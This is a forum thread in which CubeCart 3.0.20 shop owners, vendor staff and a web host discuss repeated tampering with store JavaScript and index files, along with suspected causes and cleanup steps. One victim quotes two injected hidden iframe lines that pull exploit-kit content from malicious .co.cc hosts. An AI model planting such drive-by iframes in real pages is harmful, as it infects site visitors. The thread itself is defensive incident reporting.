Jump to content

Archived

This topic is now archived and is closed to further replies.

Leo Clark

jslibrary.js hacked - avast detected

Recommended Posts

Morning Folks...

@bsmither

In CubeCart v3.0.20 the following path doesn't exist:

/admin/includes/rte/editor/filemanager/connectors/php

This suggests you are using an older version of CubeCart with older version of FCKEditor that may have a vulnerability. You'll need to upgrade.

In older versions of CC there was a vulnerability by which files could be uploaded through FCKEditor by anyone without an admin session. This has since been patched in version 3 and version 4.

Anyone with this issue must upgrade to the latest version.

If you ever think you have found a vulnerability in version 3 or version 4 please do submit an "Abuse" ticket through the contact us link on our homepage.

Share this post


Link to post
Share on other sites

Guest valtam

In CubeCart v3.0.20 the following path doesn't exist:

/admin/includes/rte/editor/filemanager/connectors/php

It does in my install of CubeCart v3.0.20

Share this post


Link to post
Share on other sites

That means your store hasn't been upgraded properly or old files remain that shouldn't be there.

Please delete the admin/includes/rte folder and then upload the same directory from 3.0.20. You should then find that file structure doesn't exist and all works as it should.

Share this post


Link to post
Share on other sites

In CubeCart v3.0.20 the following path doesn't exist:

/admin/includes/rte/editor/filemanager/connectors/php

It does in my install of CubeCart v3.0.20

You have likely upgraded your store by overwriting previous files. You can probably just delete those files. Why don't you compare a clean downloaded ZIP file of v3.0.20 with the file structure you have.

Share this post


Link to post
Share on other sites

I just launched this store a few months ago with a clean version of CC 3.0.20 and it got hacked. There was no previous version on the server.

I was able to chmod the jslibrary.js file to 444 and there have been no new hacks today but I guess they will just hit another file when they find this one locked.

Share this post


Link to post
Share on other sites

It could be the server was hacked in its entirety. Maybe a bad script on the software detected every javascript file on the server and appended the bad code to it.

Share this post


Link to post
Share on other sites

It could be the server was hacked in its entirety. Maybe a bad script on the software detected every javascript file on the server and appended the bad code to it.

This happens very often and only needs one insecure script anywhere on the server or one insecure or easy to guess FTP password and then any files that are writeable anywhere on the server can be infected like this. It is one reason that if you are running your site on Shared Hosting you should look for a hosting company that runs suPHP on their servers as this immediately prevents this from happening. We have never had this type of attack on any of our servers since we implemented suPHP across all servers several years ago.

Ian

Share this post


Link to post
Share on other sites

In CubeCart v3.0.20 the following path doesn't exist:

/admin/includes/rte/editor/filemanager/connectors/php

Oops! My bad. The path I gave earlier is the hierarchy of the latest version of FCKeditor (2.6.6). The path to look for in web log files for the version shipped with CC3.0.20 is:

/admin/includes/rte/editor/filemanager/browser/default/connectors/php/connector.php?(snipped)

Share this post


Link to post
Share on other sites
Guest BeachApe

Hi again,

karr1981 I do not believe it is MOD related. I dont have any of Estelle's on this particular store. Only Goober's Coupon Manager v2.5.

Is there a fix for that? I did not find it. And I agree that it seems to be a Cubecart oriented attack. I hope there is a solution soon.

I am on version 3.0.20 too, sdmdj.

And havenswift-hosting, thanks for you help.

I dont believe hostmonster has suPHP.

Anyway, I am counting on cubecart!

Cheers!

This is not a CubeCart problem - this is either :

- No. this IS a Cube problem. It's being repeated over and over by the posts here and now I'm adding myself to the list with the exact same thing. So:

1) A problem with the permission of the files within your hosting environment

Or a problem with CC's instruction. Check and recheck shows everything done correctly.

2) An insecure script that has been added by yourself to your enviroment.

Uh, no. Only what came with CC. If this is the case, CC provided the insecure script.

3) Or caused by somebody gaiing access to your hosting environment either by knowing or guessing your FTP password

(yawn), no. it's so easy to change a password you really think this it? Problem persists regardless. More like answer to number 2 is the problem.

Share this post


Link to post
Share on other sites
Guest BeachApe

Likewise with the rest of you guys I'm in the same boat.

Interestingly enough we've got our website under a subfolder (e.g. www.google.com.au/shop) I'll certainly be watching this thread with interest that's for sure. - Here's hoping Cubecart will release an update to fix this vulnerability ASAP!

I have only myself and one other person working on the cart. We haven't announced to anyone, linked to it or talked to friends about it. Effectually it is unknown to anyone EXCEPT to whatever Crawler someone has Written To Scour The Web In Search For This Popular CubeCart Vulnerabilty.

Share this post


Link to post
Share on other sites

This is not a CubeCart problem - this is either :

- No. this IS a Cube problem. It's being repeated over and over by the posts here and now I'm adding myself to the list with the exact same thing. So:

1) A problem with the permission of the files within your hosting environment

Or a problem with CC's instruction. Check and recheck shows everything done correctly.

2) An insecure script that has been added by yourself to your enviroment.

Uh, no. Only what came with CC. If this is the case, CC provided the insecure script.

3) Or caused by somebody gaiing access to your hosting environment either by knowing or guessing your FTP password

(yawn), no. it's so easy to change a password you really think this it? Problem persists regardless. More like answer to number 2 is the problem.

I gave the above as possible ways that this could be happening - I didnt say that any one or another was the way it had happened. This type of attack is very common and happens against many different types of website - basic html based websites as well as apps such as CubeCart as well as others. So please feel free to yawn against the freely offered advice from somebody that runs many CubeCart websites (V3 and V4 sites) and hosts several hundred sites for clients - none of which have had this type of attack ! In fact we have never had this type of attack against ANY website on ANY server. Unfortunately you always get what you pay for with hosting !

Ian

Share this post


Link to post
Share on other sites

*** IMPORTANT POST PLEASE READ CAREFULLY ***

PLEASE, take my advice and your store should be ok. There is no known vulnerability in CubeCart 3.0.20 concerning arbitrary file uploads.

1. DELETE your existing admin/includes/rte folder.

2. REPLACE it with the files and folders in 3.0.20 from admin/includes/rte

3. Replace the contaminated Javascript files.

For added security you can lock down your Javascript files with a CHMOD permission of 0444.

Once this has been done your store should be fine.

Please can anyone who have had these issues answer the following questions for me?

1. Was your store installed fresh from 3.0.20 or upgraded from an older version of 3.0.x?

2. Which hosting provider is your store hosted with?

3. Has your store been hacked again after taking the three steps above?

4. Have you seen any evidence or activity in your server access logs concerning the rte folder? Is so please let us know the entries in question.

Share this post


Link to post
Share on other sites
Guest BeachApe

I gave the above as possible ways that this could be happening - I didnt say that any one or another was the way it had happened. This type of attack is very common and happens against many different types of website - basic html based websites as well as apps such as CubeCart as well as others. So please feel free to yawn against the freely offered advice from somebody that runs many CubeCart websites (V3 and V4 sites) and hosts several hundred sites for clients - none of which have had this type of attack ! In fact we have never had this type of attack against ANY website on ANY server. Unfortunately you always get what you pay for with hosting !

Ian

Thanks Ian. I don't dispute your expertise but I take it as some proof that expertise is required and (stated from the website) "CubeCart is an "out of the box" ecommerce shopping cart software solution - is not so 'out of the box'. I made a decision on CC based on that claim and this, "It is easy to modify the look and feel of your store", but find they have forgotten prerequisites. I'll see how much more CC experience I want to gain before I either look for another solution, or perhaps become your customer. I can at least be greatful they offered a trial version.

Share this post


Link to post
Share on other sites

@beachape

There are no falsifications in the claim that "CubeCart is an "out of the box" ecommerce shopping cart software solution". That is exactly what it is, so I feel it is totally irrelevant to this thread.

EVERY piece of software from time to time may be exploited from vulnerabilities or contain bugs. How many thousands of patch releases has Windows had and how many MILLIONS of people have had and still get viruses. If you think that you can run a bulletproof website that will never stand a chance of being hacked then think again. Moving to another solution is just as likely that an issue like this is going to happen. We are a small company and take security very seriously which is why we are providing support here to get this sorted for everyone we can as soon as possible.

Now answer me this... Have you taken my recommended steps to make your store secure? If so, has it worked?

Share this post


Link to post
Share on other sites
Guest BeachApe

@beachape

There are no falsifications in the claim that "CubeCart is an "out of the box" ecommerce shopping cart software solution". That is exactly what it is, so I feel it is totally irrelevant to this thread.

EVERY piece of software from time to time may be exploited from vulnerabilities or contain bugs. How many thousands of patch releases has Windows had and how many MILLIONS of people have had and still get viruses. If you think that you can run a bulletproof website that will never stand a chance of being hacked then think again. Moving to another solution is just as likely that an issue like this is going to happen. We are a small company and take security very seriously which is why we are providing support here to get this sorted for everyone we can as soon as possible.

Now answer me this... Have you taken my recommended steps to make your store secure? If so, has it worked?

Firstly, my apologies my comments feel like epithets. I may have taken Ian's comments similarily to an oft used 'it's the user's fault'. I downloaded and followed all instructions and began my quest. I came to the forum on another matter and haven't even searched on it yet. Having found this thread I checked my files and was surprised my unlaunched, unannounced store had already experienced this. The next oft used comment is 'it's the host fault' and now they're piling on me as well over that. Anyway,

I have completed your new instructions, but to say has it worked cannot be answered yet. Like sticking my line in the water, I need to wait and see if anything bites. Once a solution is found, these and any other relevant instructions on security should be included in the box. The user manual is every bit as valuable as any other file and it's text is just as important as code.

Share this post


Link to post
Share on other sites

Firstly, my apologies my comments feel like epithets. I may have taken Ian's comments similarily to an oft used 'it's the user's fault'. I downloaded and followed all instructions and began my quest. I came to the forum on another matter and haven't even searched on it yet. Having found this thread I checked my files and was surprised my unlaunched, unannounced store had already experienced this. The next oft used comment is 'it's the host fault' and now they're piling on me as well over that. Anyway,

I have completed your new instructions, but to say has it worked cannot be answered yet. Like sticking my line in the water, I need to wait and see if anything bites. Once a solution is found, these and any other relevant instructions on security should be included in the box. The user manual is every bit as valuable as any other file and it's text is just as important as code.

No problem. Al has given very clear instructions on the best way of preventing this from a CubeCart point of view if the store is either still on an old CC3 version or has been upgraded to 3.0.20 from an old version - it does seem interesting that the mass of reports suddenly seem to have died away. You dont say what version you are on and whether this was an upgrade from an older version or not. There have been several reports of this happening to a new 3.0.20 system and if this is the case then report these to Al as he will certainly investigate.

However, even if this has happened, then it is still very unlikely to be a security hole in CubeCart itself. Most hosting businesses do not run their servers using suPHP which is an added layer of protection at the server level that almost immediately prevents this type of attack from happening. Without it, specific scripts with the wrong permissions in your hosting account or even worse, an insecure script with incorrect permissions in ANY hosting account on that server, can potentially cause this problem. As Al said, if a determined and very good hacker wants to get into a hosting server then they will (bearing in mind the types of sites that have been hacked in the past). However, these types of attacks are general script kiddies launching an automated attack across multiple servers which is probably why a sudden spate appeared.

1) Some applications do have problems but most like Al take security seriously and have their system professionally audited and will fix known exploits very quickly.

2) Most hosting companies could do more but when the cheapest of them pile thousands of websites onto one server and charge a few pounds per month - what do you really expect ? You always get what you pay for !

3) Finally, the cause most often will be from the user. This can be incorrect installations, changing permissions on files incorrectly, making their FTP passwords very insecure (there is a reason most hosting companies generate a 10 or 12 digit random password when an account is setup!) or even more common these days is having an undetected virus on their PC which logs FTP passwords which are then broadcast to hackers. Clearing the infection and changing the FTP password in these cases will obviously have no effect !

Ian

Share this post


Link to post
Share on other sites

Al, to answer your questions

I have three brand new stores all on Hostgator that uses suPHP. They were all 3.0.20 stores from the start (no previous version exsisted on this or any server). All were hacked repeatedly.

I changed the chmod of jslibrary.js to 444 after about the 4th day and have not been hacked since. That is the only thing stopping them at this point. What is to stop them from hitting any other file?

I have reuploaded the rte folder on all sites as well but since I was already a 3.0.20 store that would have been the files I had when the hack took place. That fix is suspect at best.

Share this post


Link to post
Share on other sites
Guest BeachApe

My Host is LunarPages - They have a CC install but it was not the latest version, so I bypassed it did a fresh install. I'm wrestling another matter with this cart outside this thread and lost a day between that and this.

So after following Al's instructions, that answers Q's 1 and 2. Watch on 3 and 4.

3. Has your store been hacked again after taking the three steps above?

4. Have you seen any evidence or activity in your server access logs concerning the rte folder? Is so please let us know the entries in question.

8:pm - Answers: 3 - Yes, 4 - No

This is my 3rd 'hack'. Understand trasactions are not comprimised and my server is not critically under attack either. Let me explain what my experience is at the server, then through the browser.

Server: the jslibrary.js seems to be the target. The first hack rewrote it just like the original post in this thread. I can't find it right now but somewhere someone copied the whole file in this forum. The was the first domain and ip. The second was like the next domain and ip (in this thread also).

Then I followed Al's instructions, put my line in the water and waited for the fish to bite. This time the /store/js/jslibrary.js file was rewritten a 3rd time and totally different. (copy/paste below). BUT something new. This hacker script looks to the root of the domain and finds the index.html file at the very bottom put these two lines:

<iframe src="http://hsdhdshsdfher.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAQMHBgINBQ==" width=1 height=1 frameborder=0></iframe>

<iframe src="http://dedede4.co.cc/notfound/inkujrgzk.php?n=setup2432" width=1 height=1 frameborder=0></iframe>

Addendum (9:20pm), but I think this 'notfound' may be a bugger too. I replaced the index file and reloaded the page sometime later and Norton thought my computer was under attack again. The index.hrml was okay, so this means another file was rewritten. This because I should have deleted the store first? Sorry - too tired to find new file rewrite now and I used a shotgun approach- 1. Store Deleted, 2. Entire website replaced, 3., Deleted cookies, history and cache on my computer. All okay know

My browser equipped with Norton 360 Premium and it intreprets this as:

Malicious Download (from my computer, iexplorer.exe) Critial, Risk: High

Attacker Url: http://hsdhdshsdfher.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAQMHBgINBQ==

Destination Address: hsdhdshsdfher.co.cc (76.76.117.98, 80)

Source Address: 192.168.0.197

FYI- http://www.ip-adress.com/whois/192.168.0.197

So, I've replaced my index.html file and removed the cart. This is my new fishing expedition in expectation of what's my or my host's fault. If the domain and site remains hack free, then I know I have eradicated the magnet for such - hoping to not get a bite ;-)

Now, I expect everyone has their original jslibrary.js file. This is the thrid variation in my experience: (Use Dreamweaver or NotePad++ which allow you to pull up tabs of your original and hacked copy. A simple toggle comparison shows in this instance changes begin at line 17.)

// display decision alert box

function decision(message, url){

if(confirm(message)) location.href = url;

}

// open browser window

function openPopUp(url, windowName, w, h, scrollbar) {

var winl = (screen.width - w) / 2;

var wint = (screen.height - h) / 2;

winprops = 'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scrollbar ;

win = window.open(url, windowName, winprops);

if (parseInt(navigator.appVersion) >= 4) {

win.window.focus();

}

}

function getImage(imageName)

{

document.getElementById('img').src = imageName;

}

function jumpMenu(target,object,restore){

eval(target+".location='"+object.options[object.selectedIndex].value+"'");

if (restore) object.selectedIndex=0;

}

function findObj(n, d) {

var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {

d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}

if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[n];

for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=findObj(n,d.layers.document);

if(!x && d.getElementById) x=d.getElementById(n); return x;

}

function submitDoc(formName) {

var obj;

if (obj=findObj(formName)!=null)

{

findObj(formName).submit();

}

else

{

alert('The form you are attempting to submit called \'' + formName + '\' couldn\'t be found. Please make sure the submitDoc function has the correct id and name.');

}

}

Share this post


Link to post
Share on other sites
Guest Zomnut

I too am using a stock 3.0.20 installation, not an upgrade, with no add-on scripts or modifications except some css changes to the skin, and my site was exploited in the same way. Only the /store/js/jslibrary.js file was overwritten, with no changes made to other files. Site is hosted with JustHost. Site has not been re-exploited YET following the suggestions.

Share this post


Link to post
Share on other sites

@BeachApe - It looks like there has been a malicious script run on the server looking for all index.html files and JS files which has appended code. None of the code in CubeCart appends strings to the end of files so if CubeCart was causing this the attacker would need to edit the files, add the extra bad code and then upload the file in its entirety. It is far more likely that an automated script running on the server has scanned the server and automatically appended bad code onto files matching a certain pattern. It's still possible that this is caused by CubeCart but from my experience I don't think it is. I don't know what Ian will think from an experienced web hosting providers point of view. If there is no sign of unusual activity in the access logs then it cannot be thorough CubeCart. I need to see access logs to see if there is any sign of anything. Feel free to email them to me at al at cube cart dot com. Please compress them as much as you can.

Share this post


Link to post
Share on other sites
Guest BeachApe

@Al

Sorry Al, but I never set the raw access logs to archive, so I only have events for today, useless for your review at this point. Maybe someone else will be able to supply such, or when I have a day I may go at it again to help out. My customer is putting pressure on me so I have to scout systems that host carts at their location instead of mine. Since I removed the cart I have not had any problems with any file.

As you said,

- "It is far more likely that an automated script running on the server has scanned the server and automatically appended bad code onto files matching a certain pattern."

This is what I stated before with jslibrary.js as the first target, but from my experience, it starts 'out there' searching for CC. Once found, then it begins it's rewrites. As the host user (me) deletes and replaces affected files, it has counter measure as I already described. Remember, it rewrote jslibrary 1 way, I replaced it, jslibrary rewitten a second, then a third, then my index.html. After I replace my index.html, another html was targeted. I finally stopped playing that game and deleted the whole thing. All those rewrites happen within minutes. Since I removed the cart I have not had any problems with any file (over 16 hours now).

- "It's still possible that this is caused by CubeCart but from my experience I don't think it is."

No, I do not believe this caused by CubeCart. This is caused by a script 'out there' targeting CubeCart and exploiting it. Whatever the motive, some hacker is out there with CC (at least v3) as the target. If Ian joins in, please don't blame users and hosts as incompetent or negligent, this only allows empowers the attacker and I think people will lose interest. As you can see a new member joined yesterday with exact symptoms. There is definitly a pattern. I'm sure your servers are perfect, but if you can, perhaps buy some space on a less worthy host, set up cart and troubleshoot from there? You won't need to buy host accounts all over the world, since this script seems to have a pattern specific to CC, not host. May be a cheap investment towards providing a solution to customers on your trial version. I think that's where they make their evaluations before paid for options?

Share this post


Link to post
Share on other sites

I have done everything suggested and just got hacked again.

It was not the jslibrary file this time. Not sure which file. Anyone know what they go after next? AVG said this one was a blackhole exploit if that helps

I have logs but what am I looking for? I had not idea this site got this much traffic to be honest. Just todays is serveral thousand lines long...

Share this post


Link to post
Share on other sites

I have done everything suggested and just got hacked again.

It was not the jslibrary file this time. Not sure which file. Anyone know what they go after next? AVG said this one was a blackhole exploit if that helps

I have logs but what am I looking for? I had not idea this site got this much traffic to be honest. Just todays is serveral thousand lines long...

You need to find out which file has been hacked and then ask your hosting company to check through the logs around the time the file was changed. If they are unable or unwilling to do this analysis for you, then I suggest you find a hosting company that will - you will probably find that you wont have this problem if you do move anyway ! This is still almost certainly NOT a CubeCart problem otherwise there would be tens of thousands of sites being hit by what is a fairly simple automated script

Ian

Share this post


Link to post
Share on other sites

I uploaded all clean files and I was still showing the site was corrupted. I then logged in the admin side and had 6 new bogus customers signed up. I deleted them and now it's not corrupted anymore.

That's strange....... Not sure it's related but I have been seeing a lot of bogus customers this past week or so.

Share this post


Link to post
Share on other sites

If Ian joins in, please don't blame users and hosts as incompetent or negligent, this only allows empowers the attacker and I think people will lose interest.

The problem is that there are :

1) Users that change permissions on files and directories without any idea of the possible consequences

2) incompetent hosts who are more than willing to take your money but then dont have the skills to diagnose this type of problem, dont have enough support staff or just cant be bothered.

3) So many viruses and other malicious code infecting people's insecure PC's that can then infect their own websites. There are several that record FTP passwords used on a PC and then use these to infect files on the website - to the log these will be recorded as if you had logged in yourself and changed the files !

As you can see a new member joined yesterday with exact symptoms. There is definitly a pattern. I'm sure your servers are perfect, but if you can, perhaps buy some space on a less worthy host, set up cart and troubleshoot from there? You won't need to buy host accounts all over the world, since this script seems to have a pattern specific to CC, not host. May be a cheap investment towards providing a solution to customers on your trial version. I think that's where they make their evaluations before paid for options?

If the problem is insecure permissions, account or server then doing what you suggest wouldnt solve the problem anyway but regardless of that, it isnt down to the developers to even try and fix (even if they could!) problems that arent caused by the application. You get what you pay for with your hosting - the companies out there that sell hosting space for a few pounds or dollars per month can only do so by 1) filling the server to (and often well over) capacity, making all the sites slow and 2) having little or no support.

To compare an online store with a bricks and morter store - your web hosting account is the same as your shop. Would you run your business from a shop that had broken windows, a front door that didnt lock, had no burglar alarm and had 30 different vendors running shops from a space that was only designed for one shop. Too many people spend a lot of time and money designing a shop, buying stock and maybe advertising it and then go for the cheapest hosting.

Ian

Share this post


Link to post
Share on other sites

×
×
  • Create New...